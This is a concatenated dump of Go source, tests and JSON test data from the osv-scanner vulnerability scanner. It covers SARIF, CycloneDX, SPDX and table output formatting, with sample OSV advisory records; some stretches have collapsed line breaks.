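	})
}

// buildJSONSarifReport renders res as SARIF, replaces the partial fingerprint
// hashes through testutility.ReplaceJSONInput, and decodes the result for
// snapshot comparison.
func buildJSONSarifReport(t *testing.T, res *models.VulnerabilityResults) map[string]any {
	t.Helper()

	outputWriter := &bytes.Buffer{}
	err := output.PrintSARIFReport(res, outputWriter)
	if err != nil {
		t.Errorf("Error writing SARIF output: %s", err)
	}

	replacedJSON := testutility.ReplaceJSONInput(
		t,
		outputWriter.String(),
		testutility.ReplacePartialFingerprintHash.Path,
		testutility.ReplacePartialFingerprintHash.ReplaceFunc,
	)

	jsonStructure := map[string]any{}
	err = json.NewDecoder(bytes.NewBufferString(replacedJSON)).Decode(&jsonStructure)
	if err != nil {
		t.Errorf("Error decoding SARIF output: %s", err)
	}

	return jsonStructure
}

================================================
FILE: internal/output/sbom/cyclonedx_1_4.go
================================================
// Package sbom provides functionality to generate SBOMs from scan results.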
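package sbom

import (
	"github.com/google/osv-scanner/v2/pkg/models"

	"github.com/CycloneDX/cyclonedx-go"
)

// ToCycloneDX14Bom builds a BOM from uniquePackages and labels it as CycloneDX 1.4.
func ToCycloneDX14Bom(uniquePackages map[string]models.PackageVulns) *cyclonedx.BOM {
	bom := buildCycloneDXBom(uniquePackages)
	bom.JSONSchema = cycloneDx14Schema
	bom.SpecVersion = cyclonedx.SpecVersion1_4

	return bom
}

================================================
FILE: internal/output/sbom/cyclonedx_1_5.go
================================================
package sbom

import (
	"github.com/CycloneDX/cyclonedx-go"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// ToCycloneDX15Bom builds a BOM from uniquePackages and labels it as CycloneDX 1.5.
func ToCycloneDX15Bom(uniquePackages map[string]models.PackageVulns) *cyclonedx.BOM {
	bom := buildCycloneDXBom(uniquePackages)
	bom.JSONSchema = cycloneDx15Schema
	bom.SpecVersion = cyclonedx.SpecVersion1_5

	return bom
}

================================================
FILE: internal/output/sbom/cyclonedx_1_6.go
================================================
package sbom

import (
	"github.com/CycloneDX/cyclonedx-go"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// ToCycloneDX16Bom builds a BOM from uniquePackages and labels it as CycloneDX 1.6.
func ToCycloneDX16Bom(uniquePackages map[string]models.PackageVulns) *cyclonedx.BOM {
	bom := buildCycloneDXBom(uniquePackages)
	bom.JSONSchema = cycloneDx16Schema
	bom.SpecVersion = cyclonedx.SpecVersion1_6

	return bom
}

================================================
FILE: internal/output/sbom/cyclonedx_common.go
================================================
package sbom

import (
	"slices"
	"strings"
	"time"

	"github.com/CycloneDX/cyclonedx-go"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"google.golang.org/protobuf/types/known/timestamppb"
)

// buildCycloneDXBom creates the version-independent part of a BOM: one library
// component per entry of uniquePackages (the map key is used as both BOM
// reference and package URL) and one vulnerability entry per distinct
// vulnerability ID. Components are sorted by package URL and vulnerabilities
// by ID so the output does not depend on map iteration order.
func buildCycloneDXBom(uniquePackages map[string]models.PackageVulns) *cyclonedx.BOM {
	bom := cyclonedx.NewBOM()
	components := make([]cyclonedx.Component, 0, len(uniquePackages))
	vulnerabilities := make(map[string]cyclonedx.Vulnerability)

	for packageURL, packageDetail := range uniquePackages {
		component := cyclonedx.Component{}
		component.Type = libraryComponentType
		component.BOMRef = packageURL
		component.PackageURL = packageURL
		component.Name = packageDetail.Package.Name
		component.Version = packageDetail.Package.Version

		addDeprecatedProperty(&component, packageDetail)
		fillLicenses(&component, packageDetail)
		addVulnerabilities(vulnerabilities, packageDetail)

		components = append(components, component)
	}

	slices.SortFunc(components, func(a, b cyclonedx.Component) int {
		return strings.Compare(a.PackageURL, b.PackageURL)
	})

	bomVulnerabilities := make([]cyclonedx.Vulnerability, 0, len(vulnerabilities))
	for _, vulnerability := range vulnerabilities {
		bomVulnerabilities = append(bomVulnerabilities, vulnerability)
	}

	slices.SortFunc(bomVulnerabilities, func(a, b cyclonedx.Vulnerability) int {
		return strings.Compare(a.ID, b.ID)
	})

	bom.Components = &components
	bom.Vulnerabilities = &bomVulnerabilities

	return bom
}

// fillLicenses sets component.Licenses to one entry per license of the package.
// The field is set even when the package has no licenses (to an empty list).
func fillLicenses(component *cyclonedx.Component, packageDetail models.PackageVulns) {
	licenses := make(cyclonedx.Licenses, len(packageDetail.Licenses))

	for index, license := range packageDetail.Licenses {
		licenses[index] = cyclonedx.LicenseChoice{
			License: &cyclonedx.License{
				ID: string(license),
			},
		}
	}
	component.Licenses = &licenses
}

// addVulnerabilities adds the package's vulnerabilities to the shared map,
// keyed by vulnerability ID. An ID that is already present is left untouched,
// so the first occurrence wins.
func addVulnerabilities(vulnerabilities map[string]cyclonedx.Vulnerability, packageDetail models.PackageVulns) {
	for i := range packageDetail.Vulnerabilities {
		vulnerability := packageDetail.Vulnerabilities[i]
		if _, exists := vulnerabilities[vulnerability.GetId()]; exists {
			continue
		}

		// It doesn't exist yet, lets add it
		vulnerabilities[vulnerability.GetId()] = cyclonedx.Vulnerability{
			ID:          vulnerability.GetId(),
			Updated:     formatDateIfExists(vulnerability.GetModified()),
			Published:   formatDateIfExists(vulnerability.GetPublished()),
			Rejected:    formatDateIfExists(vulnerability.GetWithdrawn()),
			References:  buildReferences(vulnerability),
			Description: vulnerability.GetSummary(),
			Detail:      vulnerability.GetDetails(),
			Affects:     buildAffectedPackages(vulnerability),
			Ratings:     buildRatings(vulnerability),
			Advisories:  buildAdvisories(vulnerability),
			Credits:     buildCredits(vulnerability),
		}
	}
}

// addDeprecatedProperty marks the component with a "deprecated" property when
// the package is flagged as deprecated; otherwise it leaves Properties unset.
func addDeprecatedProperty(component *cyclonedx.Component, packageDetail models.PackageVulns) {
	if !packageDetail.Package.Deprecated {
		return
	}

	component.Properties = &[]cyclonedx.Property{
		{
			Name:  "deprecated",
			Value: "true",
		},
	}
}

// formatDateIfExists formats ts as RFC 3339, or returns "" when ts is nil or
// converts to Go's zero time.
//
// NOTE(review): an all-zero Timestamp message converts to the Unix epoch, which
// is not Go's zero time, so it is formatted as 1970-01-01T00:00:00Z rather than
// treated as absent. Confirm that is intended.
func formatDateIfExists(ts *timestamppb.Timestamp) string {
	if ts == nil {
		return ""
	}

	t := ts.AsTime()
	if t.IsZero() {
		return ""
	}

	return t.Format(time.RFC3339)
}

// buildCredits maps the credits of the vulnerability to CycloneDX
// organizational entities, one per credit, with the credit's contact list as URLs.
func buildCredits(vulnerability *osvschema.Vulnerability) *cyclonedx.Credits {
	credits := vulnerability.GetCredits()
	organizations := make([]cyclonedx.OrganizationalEntity, len(credits))

	for index, credit := range credits {
		// Read the contacts through the getter, which (like GetName) tolerates
		// a nil credit entry; the direct field access used before did not.
		contact := credit.GetContact()
		organizations[index] = cyclonedx.OrganizationalEntity{
			Name: credit.GetName(),
			URL:  &contact,
		}
	}

	return &cyclonedx.Credits{
		Organizations: &organizations,
	}
}

// buildAffectedPackages lists the package URLs of the vulnerability's affected
// entries, each one once, in order of first appearance.
func buildAffectedPackages(vulnerability *osvschema.Vulnerability) *[]cyclonedx.Affects {
	uniqueRefs := make(map[string]bool)
	affectedPackages := make([]cyclonedx.Affects, 0)

	for _, affected := range vulnerability.GetAffected() {
		if _, exists := uniqueRefs[affected.GetPackage().GetPurl()]; exists {
			continue
		}

		uniqueRefs[affected.GetPackage().GetPurl()] = true
		affectedPackages = append(affectedPackages, cyclonedx.Affects{
			Ref: affected.GetPackage().GetPurl(),
		})
	}

	return &affectedPackages
}

// buildRatings converts each severity entry to a CycloneDX rating.
// A severity type missing from SeverityMapper yields an empty scoring method.
func buildRatings(vulnerability *osvschema.Vulnerability) *[]cyclonedx.VulnerabilityRating {
	ratings := make([]cyclonedx.VulnerabilityRating, len(vulnerability.GetSeverity()))
	for index, severity := range vulnerability.GetSeverity() {
		ratings[index] = cyclonedx.VulnerabilityRating{
			Method: SeverityMapper[severity.GetType()],
			Vector: severity.GetScore(),
		}
	}

	return &ratings
}

// buildReferences turns each alias of the vulnerability into a reference with
// an empty source.
func buildReferences(vulnerability *osvschema.Vulnerability) *[]cyclonedx.VulnerabilityReference {
	references := make([]cyclonedx.VulnerabilityReference, len(vulnerability.GetAliases()))

	for index, alias := range vulnerability.GetAliases() {
		references[index] = cyclonedx.VulnerabilityReference{
			ID:     alias,
			Source: &cyclonedx.Source{},
		}
	}

	return &references
}

// buildAdvisories collects the URLs of the references typed as advisories.
func buildAdvisories(vulnerability *osvschema.Vulnerability) *[]cyclonedx.Advisory {
	advisories := make([]cyclonedx.Advisory, 0)
	for _, reference := range vulnerability.GetReferences() {
		if reference.GetType() != osvschema.Reference_ADVISORY {
			continue
		}

		advisories = append(advisories, cyclonedx.Advisory{
			URL: reference.GetUrl(),
		})
	}

	return &advisories
}

================================================
FILE: internal/output/sbom/models.go
================================================
package sbom

import (
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvschema"

	"github.com/CycloneDX/cyclonedx-go"
)

// SpecVersionToBomCreator maps each supported CycloneDX version to the function
// that builds a BOM of that version. Looking up any other version yields a nil
// function, so callers need to check the lookup before calling the result.
var SpecVersionToBomCreator = map[models.CycloneDXVersion]CycloneDXBomCreator{
	models.CycloneDXVersion14: ToCycloneDX14Bom,
	models.CycloneDXVersion15: ToCycloneDX15Bom,
	models.CycloneDXVersion16: ToCycloneDX16Bom,
}

// CycloneDXBomCreator builds a BOM from a map of packages.
type CycloneDXBomCreator func(packageSources map[string]models.PackageVulns) *cyclonedx.BOM

// Values written to the BOM's JSONSchema field.
// NOTE(review): these use the http scheme; in the code shown they are only
// stored in the BOM as a schema identifier and never fetched.
const (
	cycloneDx14Schema = "http://cyclonedx.org/schema/bom-1.4.schema.json"
	cycloneDx15Schema = "http://cyclonedx.org/schema/bom-1.5.schema.json"
	cycloneDx16Schema = "http://cyclonedx.org/schema/bom-1.6.schema.json"
)

const libraryComponentType = "library"

// SeverityMapper maps OSV severity types to CycloneDX scoring methods.
var SeverityMapper = map[osvschema.Severity_Type]cyclonedx.ScoringMethod{
	osvschema.Severity_CVSS_V2: cyclonedx.ScoringMethodCVSSv2,
	osvschema.Severity_CVSS_V3: cyclonedx.ScoringMethodCVSSv3,
	osvschema.Severity_CVSS_V4: cyclonedx.ScoringMethodCVSSv4,
}

================================================
FILE: internal/output/spdx.go
================================================
package output

import (
	"encoding/json"
	"io"

	scalibr "github.com/google/osv-scalibr"
	"github.com/google/osv-scalibr/converter/spdx"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// PrintSPDXResults writes results to the provided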
writer in SPDX format func PrintSPDXResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error { scanResult := &scalibr.ScanResult{} for _, source := range vulnResult.Results { for _, pkg := range source.Packages { scanResult.Inventory.Packages = append(scanResult.Inventory.Packages, pkg.Package.Inventory) } } // TODO(#1783): Allow user configuration doc := spdx.ToSPDX23(scanResult.Inventory, spdx.Config{}) encoder := json.NewEncoder(outputWriter) encoder.SetIndent("", " ") return encoder.Encode(doc) } ================================================ FILE: internal/output/spdx_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/jedib0t/go-pretty/v6/text" ) func normalizeSPDXOutput(t *testing.T, str string) string { t.Helper() str = text.StripEscape(str) str = cachedregexp.MustCompile(`[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}`).ReplaceAllString(str, ``) str = cachedregexp.MustCompile(`"created": ".+T.+Z"`).ReplaceAllString(str, `"created": ""`) return str } func TestPrintSPDXResults_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintSPDXResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("%v", err) } testutility.NewSnapshot().MatchText(t, normalizeSPDXOutput(t, outputWriter.String())) }) } func TestPrintSPDXResults_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintSPDXResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("%v", err) } testutility.NewSnapshot().MatchText(t, normalizeSPDXOutput(t, 
// PrintTableResults prints the osv scan results into a human friendly table.
//
// When the built result contains an OS result, the package-view summary
// (printSummaryResult) is printed and nothing else. Otherwise the summary line
// is followed by the vulnerability table, then the license summary and license
// violation tables when the license config asks for them, then the deprecated
// package table when any deprecated package was counted.
func PrintTableResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer, terminalWidth int, showAllVulns bool) {
	// A non-positive width turns colours off. text.DisableColors is a
	// package-level call, so it is not scoped to this writer.
	if terminalWidth <= 0 {
		text.DisableColors()
	}

	built := BuildResults(vulnResult)

	// Add a newline to separate results from logs.
	fmt.Fprintln(outputWriter)

	// OS results get the per-package summary view instead of the flat table.
	if containsOSResult(built) {
		printSummaryResult(built, outputWriter, terminalWidth, showAllVulns)
		return
	}

	// Print summary at the top
	printSummary(built, outputWriter)

	// Render the vulnerabilities, skipping an empty table.
	vulnTable := tableBuilder(newTable(outputWriter, terminalWidth), built, showAllVulns)
	if vulnTable.Length() != 0 {
		vulnTable.Render()
	}

	// Render the licenses if any.
	licenses := vulnResult.ExperimentalAnalysisConfig.Licenses
	if licenses.Summary {
		buildLicenseSummaryTable(outputWriter, terminalWidth, vulnResult)
	}
	if len(licenses.Allowlist) > 0 {
		buildLicenseViolationsTable(outputWriter, terminalWidth, vulnResult)
	}

	// Render deprecated packages if any.
	if built.PkgDeprecatedCount > 0 {
		printPkgDeprecatedSummary(built, outputWriter)
		buildDeprecatedPackagesTable(outputWriter, terminalWidth, vulnResult)
	}
}
// printSummaryResult writes the package-view report for result to outputWriter:
// a header, the summary line(s), an optional license summary, one table per
// source, an optional "Filtered Vulnerabilities" table, and a closing hint about
// other output formats.
//
// terminalWidth is passed through to newTable and printLicenseSummary.
// showAllVulns selects between printing the filtered-vulnerability table and
// printing only a prompt that hidden vulnerabilities exist.
//
// NOTE(review): pkg.Name, source.Name, eco.Name and the license violation values
// are passed to the table writer without any escaping in this function. If they
// can carry control or escape characters from a scanned lockfile or image,
// confirm they are neutralised before reaching a terminal.
func printSummaryResult(result Result, outputWriter io.Writer, terminalWidth int, showAllVulns bool) {
	// Add a newline to separate results from logs.
	fmt.Fprintln(outputWriter)

	if result.IsContainerScanning {
		fmt.Fprintf(outputWriter, "%s:\n", GetContainerScanningHeader(result))
	} else {
		fmt.Fprint(outputWriter, "Scanning Result (package view):\n")
	}

	printSummary(result, outputWriter)
	if result.PkgDeprecatedCount > 0 {
		printPkgDeprecatedSummary(result, outputWriter)
	}

	// Add a newline
	fmt.Fprintln(outputWriter)

	if result.LicenseSummary.Summary {
		printLicenseSummary(result.LicenseSummary, outputWriter, terminalWidth)
	}

	for _, eco := range result.Ecosystems {
		// The ecosystem name is printed as a heading only when
		// ecosystemHasRegVuln reports true for it.
		if ecosystemHasRegVuln(eco) {
			fmt.Fprintln(outputWriter, eco.Name)
		}

		for _, source := range eco.Sources {
			// Skip sources that have neither regular packages nor deprecated ones.
			if source.PackageTypeCount.Regular == 0 && source.PkgDeprecatedCount == 0 {
				continue
			}

			outputTable := newTable(outputWriter, terminalWidth)
			outputTable.SetTitle("Source:" + source.Name)

			// The header is assembled column by column; the row construction
			// below appends its optional cells under the same conditions and in
			// the same order, which keeps cells aligned with their headers.
			sourcePackageHeader := "Package"
			if isOSResult(source.Type) {
				sourcePackageHeader = "Source Package"
			}
			tableHeader := table.Row{sourcePackageHeader, "Installed Version", "Fix Available", "Vuln Count"}
			if isOSResult(source.Type) {
				tableHeader = append(tableHeader, "Binary Packages (Count)")
			}
			if result.IsContainerScanning {
				tableHeader = append(tableHeader, "Introduced Layer", "In Base Image")
			}
			if result.LicenseSummary.ShowViolations {
				tableHeader = append(tableHeader, "License Violations")
			}
			if source.PkgDeprecatedCount > 0 {
				tableHeader = append(tableHeader, "Deprecated")
			}
			outputTable.AppendHeader(tableHeader)

			for _, pkg := range source.Packages {
				// A package gets a row only if it has a regular vulnerability,
				// a license violation, or is marked deprecated.
				if pkg.VulnCount.AnalysisCount.Regular == 0 && len(pkg.LicenseViolations) == 0 && !pkg.Deprecated {
					continue
				}

				outputRow := table.Row{}
				totalCount := pkg.VulnCount.AnalysisCount.Regular

				// Three states: no fix at all, fixes for only some of the
				// vulnerabilities, or a fix for every one of them.
				var fixAvailable string
				if pkg.FixedVersion == UnfixedDescription {
					fixAvailable = UnfixedDescription
				} else {
					if pkg.VulnCount.FixableCount.UnFixed > 0 {
						fixAvailable = "Partial fixes Available"
					} else {
						fixAvailable = "Fix Available"
					}
				}
				outputRow = append(outputRow, pkg.Name, getInstalledVersionOrCommit(pkg), fixAvailable, totalCount)

				if isOSResult(source.Type) {
					outputRow = append(outputRow, formatBinaryPackages(pkg.OSPackageNames))
				}

				if result.IsContainerScanning {
					layer := fmt.Sprintf("# %d Layer", pkg.LayerDetail.LayerIndex)
					// A base image index of 0 is shown as "--".
					// NOTE(review): presumably 0 means "not from a base image" - confirm.
					inBaseImage := "--"
					if pkg.LayerDetail.BaseImageInfo.Index != 0 {
						inBaseImage = getBaseImageName(pkg.LayerDetail.BaseImageInfo)
					}
					outputRow = append(outputRow, layer, inBaseImage)
				}

				if result.LicenseSummary.ShowViolations {
					if len(pkg.LicenseViolations) == 0 {
						outputRow = append(outputRow, "--")
					} else {
						// The slice itself is used as the cell value; it is not
						// joined into a string here.
						outputRow = append(outputRow, pkg.LicenseViolations)
					}
				}

				if source.PkgDeprecatedCount > 0 {
					if pkg.Deprecated {
						outputRow = append(outputRow, "True")
					} else {
						outputRow = append(outputRow, "--")
					}
				}

				outputTable.AppendRow(outputRow)
			}
			outputTable.Render()
		}
	}

	// The filtered table is gated on result.VulnTypeSummary.Hidden, whereas the
	// prompt further down is gated on result.VulnCount.AnalysisCount.Hidden.
	if showAllVulns && result.VulnTypeSummary.Hidden != 0 {
		// Add a newline
		fmt.Fprintln(outputWriter)
		fmt.Fprintln(outputWriter, "Filtered Vulnerabilities:")

		outputTable := newTable(outputWriter, terminalWidth)
		outputTable.AppendHeader(table.Row{"Package", "Ecosystem", "Installed Version", "Filtered Vuln Count", "Filter Reasons"})

		for _, eco := range result.Ecosystems {
			for _, source := range eco.Sources {
				for _, pkg := range source.Packages {
					if pkg.VulnCount.AnalysisCount.Hidden == 0 {
						continue
					}
					outputRow := table.Row{}
					totalCount := pkg.VulnCount.AnalysisCount.Hidden
					filteredReasons := getFilteredVulnReasons(pkg.HiddenVulns)
					outputRow = append(outputRow, pkg.Name, eco.Name, getInstalledVersionOrCommit(pkg), totalCount, filteredReasons)
					outputTable.AppendRow(outputRow)
				}
			}
		}
		outputTable.Render()
	}

	// Add a newline
	fmt.Fprintln(outputWriter)

	// Without showAllVulns, hidden findings are only announced, not listed.
	if !showAllVulns && result.VulnCount.AnalysisCount.Hidden != 0 {
		promptUnimportant := formatHiddenVulnsPrompt(result.VulnCount.AnalysisCount.Hidden)
		fmt.Fprintln(outputWriter, promptUnimportant)
	}

	// This hint is printed unconditionally, including when
	// result.IsContainerScanning is false.
	const promptMessage = "For the most comprehensive scan results, we recommend using the HTML output: " +
		"`osv-scanner scan image --serve `.\n" +
		"You can also view the full vulnerability list in your terminal with: " +
		"`osv-scanner scan image --format vertical `."
	fmt.Fprintln(outputWriter, promptMessage)
}
// MaxSeverity returns the highest overall severity score among the
// vulnerabilities of pkg whose IDs are listed in group, formatted with one
// decimal place. It returns "" when the highest score is negative, which
// includes the case of group having no IDs.
//
// For each ID the severities of the matching entry in pkg.Vulnerabilities are
// used; if several entries share the ID the last one wins, and if none matches
// a nil severity list is scored. The second and third results of
// severity.CalculateOverallScore are discarded, so a scoring error is not
// reported to the caller.
func MaxSeverity(group models.GroupInfo, pkg models.PackageVulns) string {
	best := float64(-1)

	for _, wantedID := range group.IDs {
		var found []*osvschema.Severity
		for _, candidate := range pkg.Vulnerabilities {
			if candidate.GetId() != wantedID {
				continue
			}
			found = candidate.GetSeverity()
		}

		overall, _, _ := severity.CalculateOverallScore(found)
		best = max(best, overall)
	}

	// Still at (or below) the sentinel: nothing usable was scored.
	if best < 0 {
		return ""
	}

	return fmt.Sprintf("%.1f", best)
}
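// formatBinaryPackages joins the package names in slice with ", " for display
// in a narrow table column.
//
// If the joined text is at most 20 bytes long it is returned unchanged.
// Otherwise it is cut to at most 20 bytes, trimmed back to the last comma inside
// that prefix (when there is one) so that no name is shown half-written, and
// suffixed with "... (N)" where N is len(slice).
//
// The cut never lands inside a multi-byte UTF-8 sequence: slicing a Go string
// works on bytes, so a plain result[:20] could leave a partial character at the
// end and put invalid UTF-8 into the rendered table.
func formatBinaryPackages(slice []string) string {
	const maxChars = 20

	result := strings.Join(slice, ", ")
	if len(result) <= maxChars {
		return result
	}

	// result[cut] exists because len(result) > maxChars. While it is a UTF-8
	// continuation byte (10xxxxxx) the cut would split a character, so step
	// back. A valid sequence has at most three continuation bytes; the bound
	// keeps malformed input from shrinking the prefix any further.
	cut := maxChars
	for back := 0; back < 3 && cut > 0 && result[cut]&0xC0 == 0x80; back++ {
		cut--
	}
	truncatedResult := result[:cut]

	// Find the last comma before truncation to avoid cutting words
	lastComma := strings.LastIndex(truncatedResult, ",")
	if lastComma != -1 {
		truncatedResult = truncatedResult[:lastComma]
	}

	return fmt.Sprintf("%s... (%d)", truncatedResult, len(slice))
}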
outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, 800, false) testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String())) }) } func TestPrintTableResults_LongTerminalWidth_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, 800, true) testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String())) }) } func TestPrintTableResults_NoTerminalWidth_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, -1, true) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintTableResults_NoTerminalWidth_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, -1, false) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintTableResults_NoTerminalWidth_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, -1, true) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } ================================================ FILE: internal/output/testdata/commit-grouped.json ================================================ { "DisplayID": "OSV-2023-72", "PkgSource": [ { "Package": { "name": "https://fuchsia.googlesource.com/third_party/android.googlesource.com/platform/external/perfetto", "version": "", "ecosystem": "", "commit": 
"b8da07095979310818f0efde2ef3c69ea70d62c5" }, "Source": { "path": "/Documents/Project/engine/deps_flatten.txt", "type": "lockfile" } } ], "AliasedVulns": { "OSV-2023-72": { "modified": "2023-04-20T22:43:30Z", "published": "2023-02-18T13:00:15Z", "schema_version": "1.6.0", "id": "OSV-2023-72", "summary": "Heap-buffer-overflow in perfetto::trace_processor::TrackEventParser::ParseTrackDescriptor", "details": "OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=56057\n\n```\nCrash type: Heap-buffer-overflow WRITE 4\nCrash state:\nperfetto::trace_processor::TrackEventParser::ParseTrackDescriptor\nperfetto::trace_processor::TrackEventModule::ParseTracePacketData\nperfetto::trace_processor::ProtoTraceParser::ParseTracePacket\n```\n", "affected": [ { "package": { "ecosystem": "OSS-Fuzz", "name": "perfetto", "purl": "pkg:generic/perfetto" }, "ranges": [ { "type": "GIT", "events": [ { "introduced": "8209fb9b9a4156232aa87ad4621e541bfb777ec1" }, { "fixed": "9a7f09383dd39f19e662d428321ca708a2a600a3" } ], "repo": "https://android.googlesource.com/platform/external/perfetto/" } ], "versions": [ "android-13.0.0_r1", "android-13.0.0_r12", "android-13.0.0_r2", "android-13.0.0_r3", "android-13.0.0_r31", "android-13.0.0_r4", "android-13.0.0_r5", "android-13.0.0_r6", "android-13.0.0_r7", "android-13.0.0_r8", "android-cts-13.0_r1", "android-cts-13.0_r2", "android-cts-13.0_r3", "android-mainline-12.0.0_r100", "android-mainline-12.0.0_r122", "android-mainline-12.0.0_r49", "android-mainline-12.0.0_r59", "android-mainline-12.0.0_r63", "android-mainline-12.0.0_r70", "android-mainline-12.0.0_r77", "android-mainline-12.0.0_r99", "android-platform-13.0.0_r1", "android-platform-13.0.0_r2", "android-security-13.0.0_r1", "android-security-13.0.0_r2", "android-vts-13.0_r1", "android-vts-13.0_r2", "android-vts-13.0_r3", "platform-tools-29.0.1", "platform-tools-29.0.2", "platform-tools-29.0.3", "platform-tools-29.0.4", "platform-tools-29.0.5", "platform-tools-29.0.6", 
"platform-tools-30.0.0", "platform-tools-30.0.1", "platform-tools-30.0.2", "platform-tools-30.0.3", "platform-tools-30.0.4", "platform-tools-30.0.5", "platform-tools-31.0.0", "platform-tools-31.0.1", "platform-tools-31.0.2", "platform-tools-31.0.3", "platform-tools-32.0.0", "platform-tools-33.0.0", "platform-tools-33.0.1", "platform-tools-33.0.2", "platform-tools-33.0.3", "platform-tools-33.0.4", "platform-tools-34.0.0", "v27.0", "v27.1", "v28.0", "v29.0", "v30.0", "v31.0", "v32.0", "v32.1", "v32.2", "android-security-13.0.0_r3", "android-security-13.0.0_r4" ], "database_specific": { "source": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/perfetto/OSV-2023-72.yaml" }, "ecosystem_specific": { "severity": "HIGH" } } ], "references": [ { "type": "REPORT", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=56057" } ] } }, "AliasedIDList": [ "OSV-2023-72" ] } ================================================ FILE: internal/output/testdata/flattened_vulns.json ================================================ [ { "Source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "Package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "Vulnerability": { "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "schema_version": "1.4.0", "id": "GHSA-c3h9-896r-86jm", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. 
plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, "GroupInfo": { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" 
